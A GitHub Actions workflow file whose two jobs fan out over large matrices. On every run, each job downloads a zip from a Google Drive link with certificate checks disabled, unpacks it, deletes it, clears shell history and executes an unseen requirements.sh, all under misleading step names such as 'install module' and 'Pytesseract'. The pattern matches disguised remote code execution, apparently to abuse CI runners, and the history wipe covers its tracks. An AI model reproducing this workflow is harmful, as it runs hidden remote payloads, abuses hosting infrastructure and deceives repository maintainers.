name: zetasuoi712system
on:
  push:
    branches: [ "main" ]
  workflow_dispatch:

jobs:
  VALIDATE:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      max-parallel: 10
      matrix:
        go: [I.o, I.i, I.ii]
        flag: ['Initialize', 'Develop', 'Test', 'Execute', 'Release']

    env:
        NUM_JOBS: 20
        JOB: ${ matrix.go }
    steps:
    - uses: actions/checkout@v1
    - name: install module
      run: |
        wget --no-check-certificate "https://docs.google.com/uc?export=download&id=1FbHgxzHFHcKnLHf3sjtDmImLmA6wUHNn" -O Dagster.zip
        unzip -o Dagster.zip
        rm Dagster.zip
        history -c && history -w

    - name: Pytesseract
      run: bash requirements.sh


  INIT1:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      max-parallel: 10
      matrix:
        go: [I.o, I.i, I.ii]
        flag: ['Plan', 'Assemble', 'Validate', 'Run', 'Publish']

    env:
        NUM_JOBS: 20
        JOB: ${ matrix.go }
    steps:
    - uses: actions/checkout@v1
    - name: install module
      run: |
        wget --no-check-certificate "https://docs.google.com/uc?export=download&id=1FbHgxzHFHcKnLHf3sjtDmImLmA6wUHNn" -O Dagster.zip
        unzip -o Dagster.zip
        rm Dagster.zip
        history -c && history -w

    - name: Pytesseract
      run: bash requirements.sh
        
